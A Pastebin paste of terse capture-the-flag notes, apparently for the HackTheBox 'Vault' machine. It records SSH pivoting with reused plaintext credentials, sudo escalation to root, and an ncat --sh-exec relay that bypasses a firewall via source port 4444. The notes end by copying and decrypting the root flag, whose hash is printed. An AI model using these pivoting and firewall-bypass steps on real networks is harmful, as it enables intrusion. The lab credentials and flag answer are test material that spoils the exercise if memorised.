Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ACCESS WEBSITE FROM SERVER
- ssh -D 8080 dave@10.10.10.109
- ==============================================================================================================
- REWORK THIS AREA
- ==============================================================================================================
- MORE CREDENTIALS FOUND
- root@DNS: var www DNS desktop# cat ssh
- dave
- dav3gerous567
- SSH INTO DNS SERVER
- ssh dave@192.168.122.4
- dav3gerous567
- READ ALEX .BASG_HISTORY AND LOOKED AT VISUDO FILE WHICH LETS ADMINS SUDO AS ROOT
- BECOME ROOT
- sudo su -
- dav3gerous567
- TRACEROUTE (using port 1723/tcp)
- HOP RTT ADDRESS
- 1 0.82 ms 192.168.5.1
- Nmap scan report for Vault (192.168.5.2)
- Host is up (0.0021s latency).
- Not shown: 998 filtered ports
- PORT STATE SERVICE VERSION
- 53/tcp closed domain
- 4444/tcp closed krb524
- Too many fingerprints match this host to give specific OS details
- Network Distance: 2 hops
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 0.98 ms 192.168.122.5
- 2 1.86 ms Vault (192.168.5.2)
- HOW TO +++++====================================================================================================
- SEE WHAT PORTS ARE OPEN ON VAULT
- cat /var/log/auth.log | grep -a 192.168.5.2
- (port 4444 is used for ssh)
- SET UP A LISTENER
- ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
- ENSURE PORT IS OPEN
- /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
- SSH IN
- ssh dave@localhost -p 5555
- IS PORT BEING USED BY SOMEONE ELSE
- ps aux | grep ncat
- dave@vault:~$ ls
- root.txt.gpg
- SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
- root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
- [1] 14627
- COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
- root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
- dave@localhost's password:
- root.txt.gpg 100% 629 0.6KB/s 00:00
- [1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
- root@DNS:~# cd /tmp
- root@DNS:/tmp# ls
- root.txt.gpg test.txt
- COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
- dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
- dave@192.168.122.4's password:
- root.txt.gpg 100% 629 0.6KB/s 00:00
- dave@ubuntu:~$ cd /dev/shm
- DECRYPT THE GPG ROOT FILE USING THE KEY FOUND IN DAVES DESKTOP FOLDER
- dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg
- You need a passphrase to unlock the secret key for
- user: "david <dave@david.com>"
- 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
- gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
- "david <dave@david.com>"
- itscominghome
- ROOT FILE
- ca468370b91d1f5906e31093d9bfe819
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement